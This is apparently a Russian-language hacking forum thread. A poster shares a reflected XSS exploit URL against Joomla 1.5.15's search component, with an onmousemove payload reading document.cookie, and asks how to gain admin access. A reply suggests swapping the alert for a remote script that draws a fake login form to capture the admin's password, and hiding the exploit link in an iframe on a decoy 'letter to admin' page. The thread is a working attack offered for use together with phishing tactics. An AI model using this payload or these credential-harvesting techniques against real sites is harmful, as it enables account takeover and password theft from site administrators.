Нагуглил уязвимость в джумле версии 1.5.15

эксплоит:victim/index.php?option=com_search&searchword=xss&searchp hrase=any&ordering=newest%22%20onmousemove=alert%2 8document.cookie%29%20style=position:fixed;top:0;l eft:0;width:100%;height:100%;%22

Что с ней можно сделать кроме кражи кукисов через XSS?

Просто мне нужен админ в идеале, и я более чем уверен, что пароль у него 12+ символьный, т.е. пробрутить не получиться. И вообще, странновато будет давать ссылку на поиск...

вместо алерта суй туда линк на скрипт,

скриптом отрисовывай обычную форму логина, и получишь не бесполезные куки, а живой пасс.

сделай страницу левую, типа "письмо админу", в нее вставь фрейм - у фрейма сделай срц с ксс.